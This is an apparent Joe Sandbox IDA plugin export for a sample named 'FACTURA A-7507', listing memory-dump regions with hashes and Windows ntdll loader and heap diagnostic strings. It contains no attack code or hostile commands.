                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_35400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                                                                                                                                                                          • API String ID: 0-4253913091
                                                                                                                                                                                                                          • Opcode ID: 7f8705eb5177cf0f25fd23b603c1d278420c7a198c812d943b604d8bd8c0b3af
                                                                                                                                                                                                                          • Instruction ID: 779362e587ad91c415f155f8a1bb4b50ae0b9eada86e2b76f8e1cc3f667f42e5
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7f8705eb5177cf0f25fd23b603c1d278420c7a198c812d943b604d8bd8c0b3af
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 23F18BB4A40605DFEB1CCF68C984FAABBB5FF44344F108199E40A9B385DB74E991CB91
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, Offset: 35400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.0000000035529000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_35400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: DebugPrintTimes
                                                                                                                                                                                                                          • String ID: LdrpUnloadNode$Unmapping DLL "%wZ"$minkernel\ntdll\ldrsnap.c
                                                                                                                                                                                                                          • API String ID: 3446177414-2283098728
                                                                                                                                                                                                                          • Opcode ID: e7dbd3dea4fac7fae937dff72e6c2bec8f37c18a69dca31f6dc1c5241bc8a0d2
                                                                                                                                                                                                                          • Instruction ID: fa51f3d6d02b93f506f1f418b753d304ace1e08ec62c3bd4a6262181d7bf13cf
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e7dbd3dea4fac7fae937dff72e6c2bec8f37c18a69dca31f6dc1c5241bc8a0d2
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6651F1757143019FE71CDF38C884B1A77B2BB88724F150AAEE4529B791EB70E845CB92
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, Offset: 35400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.0000000035529000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_35400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: DebugPrintTimes
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, Offset: 35400000, based on PE: true
• Associated: 00000002.00000002.26722750004.0000000035529000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_35400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlFreeHeap
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, Offset: 35400000, based on PE: true
• Associated: 00000002.00000002.26722750004.0000000035529000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_35400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: $$.mui$.mun$SystemResources\
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, Offset: 35400000, based on PE: true
• Associated: 00000002.00000002.26722750004.0000000035529000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_35400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, Offset: 35400000, based on PE: true
• Associated: 00000002.00000002.26722750004.0000000035529000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_35400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: LU@5$LdrResGetRCConfig Enter$LdrResGetRCConfig Exit$MUI
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, Offset: 35400000, based on PE: true
• Associated: 00000002.00000002.26722750004.0000000035529000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_35400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: @$LdrpResMapFile Enter$LdrpResMapFile Exit$X}A5
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, Offset: 35400000, based on PE: true
• Associated: 00000002.00000002.26722750004.0000000035529000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_35400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: LU@5$LdrpResGetResourceDirectory Enter$LdrpResGetResourceDirectory Exit${
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, Offset: 35400000, based on PE: true
• Associated: 00000002.00000002.26722750004.0000000035529000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_35400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: HEAP: $HEAP[%wZ]: $ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)$`
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, Offset: 35400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.0000000035529000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_35400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit$l/I5
                                                                                                                                                                                                                          • API String ID: 0-1631256039
                                                                                                                                                                                                                          • Opcode ID: a7358caab6514616873a200f0e2544bee2e2f1fad09cd94aaf564dd5bdae78ce
                                                                                                                                                                                                                          • Instruction ID: 930fe3e37a7b8ceb4faab096ae1f90ea20a392591643788ee0cfa53283101630
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a7358caab6514616873a200f0e2544bee2e2f1fad09cd94aaf564dd5bdae78ce
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0B41E27AA04354EBEB19CBA4C880B9CB7B8FF85740F2000DAD811EB391FB758941CB11
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, Offset: 35400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.0000000035529000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_35400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: HEAP: $HEAP[%wZ]: $VirtualProtect Failed 0x%p %x$VirtualQuery Failed 0x%p %x
                                                                                                                                                                                                                          • API String ID: 0-1391187441
                                                                                                                                                                                                                          • Opcode ID: 61ed593d93e11c56b81e21f774beb66bb4e3ed760dd534ac1f5a4ef621bb979f
                                                                                                                                                                                                                          • Instruction ID: c3b8e1da2c7e4cd102c4eac48c67649f563b14d8660975027c26120c93f62504
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 61ed593d93e11c56b81e21f774beb66bb4e3ed760dd534ac1f5a4ef621bb979f
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4231D576A00214EFEB09CB56CC84FDAB7B9FF457A0F1140A5E815AB391D731E940CE60
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, Offset: 35400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.0000000035529000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_35400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: @$BuildLabEx$\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion$eF5
                                                                                                                                                                                                                          • API String ID: 0-308786184
                                                                                                                                                                                                                          • Opcode ID: 407c755b68f4ec02dd6d9c758742cc6edbdac8ff7d311d90ea503818e906d973
                                                                                                                                                                                                                          • Instruction ID: 4b238861dc360721504862431b88074c3b1bd0a4e4137c43a6e474978d8273ee
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 407c755b68f4ec02dd6d9c758742cc6edbdac8ff7d311d90ea503818e906d973
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C53152B2A04659BBDB1ACB94CC44EDEBBBDEF84754F104029E525B7260EB30DA05DB90
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, Offset: 35400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.0000000035529000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_35400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: .txt$.txt2$BoG_ *90.0&!! Yy>$stxt371
                                                                                                                                                                                                                          • API String ID: 0-1880532218
                                                                                                                                                                                                                          • Opcode ID: 5512db7b2451f4f7b08f252120c1c7c1f89c93e074c898a5a773b6ca3232636b
                                                                                                                                                                                                                          • Instruction ID: 4305aa8069f2ea0eb622795d5a250444d06f5f4dbfa763994eefb10ada15dc0c
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5512db7b2451f4f7b08f252120c1c7c1f89c93e074c898a5a773b6ca3232636b
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B2217B79A012809BDB09CB58DD41FDAB3F5AF45740F1550A9E886E7340E7B4D905C760
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, Offset: 35400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.0000000035529000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_35400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: DebugPrintTimes
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3446177414-0
                                                                                                                                                                                                                          • Opcode ID: f45654e26ebc138ba87cfbe217858358a4c8f897535071a0fe6c4fca493c31a6
                                                                                                                                                                                                                          • Instruction ID: 3f7c05cb1ebcc19a4f3113122c838c771864ed14d05745176fafa7880928a848
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f45654e26ebc138ba87cfbe217858358a4c8f897535071a0fe6c4fca493c31a6
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DE512535A01705EFEB0DCF64C945B9DBBB1BF48325F1041AAE552973A0DB709A21CF80
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, Offset: 35400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.0000000035529000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_35400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: LdrpResSearchResourceHandle Enter$LdrpResSearchResourceHandle Exit$PE
                                                                                                                                                                                                                          • API String ID: 0-1168191160
                                                                                                                                                                                                                          • Opcode ID: 5539635d4040db084653c8374e110ebcded10e41f77777eaab3e10ee899ef027
                                                                                                                                                                                                                          • Instruction ID: 1658a1358fb96dc2cddee9662dfc1d516f94c49c374659f8603641f31ad03e10
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5539635d4040db084653c8374e110ebcded10e41f77777eaab3e10ee899ef027
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 02F18EB9A052289BDB28CB14CCC0BD9B3B5BF84754F5080E9D509AB341FB719E85CF59
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 35431648
                                                                                                                                                                                                                          • HEAP: , xrefs: 354314B6
                                                                                                                                                                                                                          • HEAP[%wZ]: , xrefs: 35431632
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, Offset: 35400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.0000000035529000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_35400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                                                                                                                                                                                          • API String ID: 0-3178619729
                                                                                                                                                                                                                          • Opcode ID: 810dc30b5afb167bc41e7329c9e2747d75e0bd8165169b792eb09c1fe22a6326
                                                                                                                                                                                                                          • Instruction ID: 320dbce6672888e7e8fc54c8966013454ac74a863a88d805817021c237bf4b6d
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 810dc30b5afb167bc41e7329c9e2747d75e0bd8165169b792eb09c1fe22a6326
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A8E1F174A053859BE71CCF68C482ABABBF1BF48300F1488ADE4968B356E774E955CB50
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 354A00C7
                                                                                                                                                                                                                          • RTL: Re-Waiting, xrefs: 354A0128
                                                                                                                                                                                                                          • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 354A00F1
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, Offset: 35400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.0000000035529000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_35400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                                                                                                                                                          • API String ID: 0-2474120054
                                                                                                                                                                                                                          • Opcode ID: 530ab8ccf7292877401b6fb57159e2310ec03963d16bbc549e3fa5ee2bc83ac2
                                                                                                                                                                                                                          • Instruction ID: 961b20d5dd3599af877fca81252ada639d2a977a4f715969dec6e979d000b5f1
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 530ab8ccf7292877401b6fb57159e2310ec03963d16bbc549e3fa5ee2bc83ac2
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EEE1B0B5608741AFE719CF28C880B4AB7E1BF84364F100A9DF5A58B3D1DB75E945CB42
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, Offset: 35400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.0000000035529000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_35400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: @$DelegatedNtdll$\SystemRoot\system32\
                                                                                                                                                                                                                          • API String ID: 0-2391371766
                                                                                                                                                                                                                          • Opcode ID: c9d1905f8a285d0d51281c1638f84094198883afddc5ae67022de1feb36b4ba8
                                                                                                                                                                                                                          • Instruction ID: 033c8243e46b086254746e0c46088cfa21f2c0f07aa6b0c569b20bfca3ee0f7a
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c9d1905f8a285d0d51281c1638f84094198883afddc5ae67022de1feb36b4ba8
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: ABB192B5618341AFE715CF55C880B5BB7F8FB48754F400969FA909B250EBF0E848CBA2
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, Offset: 35400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.0000000035529000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_35400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: Objects=%4u$Objects>%4u$VirtualAlloc
                                                                                                                                                                                                                          • API String ID: 0-3870751728
                                                                                                                                                                                                                          • Opcode ID: ca64edd244a1b72ebee25975dbe181abdb024ce566083c6b3d41e53df4a4db22
                                                                                                                                                                                                                          • Instruction ID: c45ea359bf68a223550c73a65d0236310c98db6b9a23a9422399067ff1e4b57d
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ca64edd244a1b72ebee25975dbe181abdb024ce566083c6b3d41e53df4a4db22
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 30913CB4E002059FEB1CCFA9C980B9DB7F1BF48314F14816AE945AB391E7B59842CF64
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • \Registry\Machine\SYSTEM\CurrentControlSet\Control\International, xrefs: 3550B3AA
                                                                                                                                                                                                                          • TargetNtPath, xrefs: 3550B3AF
                                                                                                                                                                                                                          • GlobalizationUserSettings, xrefs: 3550B3B4
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, Offset: 35400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.0000000035529000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_35400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: GlobalizationUserSettings$TargetNtPath$\Registry\Machine\SYSTEM\CurrentControlSet\Control\International
                                                                                                                                                                                                                          • API String ID: 0-505981995
                                                                                                                                                                                                                          • Opcode ID: b0b713fcdfea9f93a1da5c3c8ef0b84330e9cdef5e33750f25265f8656cc99a5
                                                                                                                                                                                                                          • Instruction ID: 84a0bd1764e7bad2ec223e58819f1f3e5a8854c10ac8ffad99c4f8f38b99b6a4
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b0b713fcdfea9f93a1da5c3c8ef0b84330e9cdef5e33750f25265f8656cc99a5
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 37617F72D41229ABDB25DF54DC88BDEB7B8BB04724F5101E9A508AB250DB74EE84CF90
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 3548E455
                                                                                                                                                                                                                          • HEAP: , xrefs: 3548E442
                                                                                                                                                                                                                          • HEAP[%wZ]: , xrefs: 3548E435
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, Offset: 35400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.0000000035529000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_35400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: HEAP: $HEAP[%wZ]: $RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)
                                                                                                                                                                                                                          • API String ID: 0-1340214556
                                                                                                                                                                                                                          • Opcode ID: 1e54903326818489d689e4eb67a44eed3d2a7cc46eed3640135bf342b0b3d581
                                                                                                                                                                                                                          • Instruction ID: 09ed64ed470f03c58c6136a53f60141eaf9594526e4881039b64958554614faf
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1e54903326818489d689e4eb67a44eed3d2a7cc46eed3640135bf342b0b3d581
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6B510D35604794AFE31ACBA8C885F8AFBF8FF04744F4040A8E5418B792D774EA41CB51
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • Could not validate the crypto signature for DLL %wZ, xrefs: 3549A396
                                                                                                                                                                                                                          • minkernel\ntdll\ldrmap.c, xrefs: 3549A3A7
                                                                                                                                                                                                                          • LdrpCompleteMapModule, xrefs: 3549A39D
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, Offset: 35400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.0000000035529000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_35400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                                                                                                                                                                                                                          • API String ID: 0-1676968949
                                                                                                                                                                                                                          • Opcode ID: 562e56a52f3781fc282346b3229ae4f8c5db5206b19518b3ea4cc9e5f17c5f3e
                                                                                                                                                                                                                          • Instruction ID: 8f566a54b1fc1a137dc1f7af01ad3dd02d76cdb8ee43dbaac8ed94743d900988
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 562e56a52f3781fc282346b3229ae4f8c5db5206b19518b3ea4cc9e5f17c5f3e
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C7514475B047899BEB1DCB58C845B5A7BF1BB00764F100AD8EC929B7E2DB70E900CB44
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • Heap block at %p modified at %p past requested size of %Ix, xrefs: 354DD7B2
                                                                                                                                                                                                                          • HEAP: , xrefs: 354DD79F
                                                                                                                                                                                                                          • HEAP[%wZ]: , xrefs: 354DD792
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, Offset: 35400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.0000000035529000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmp
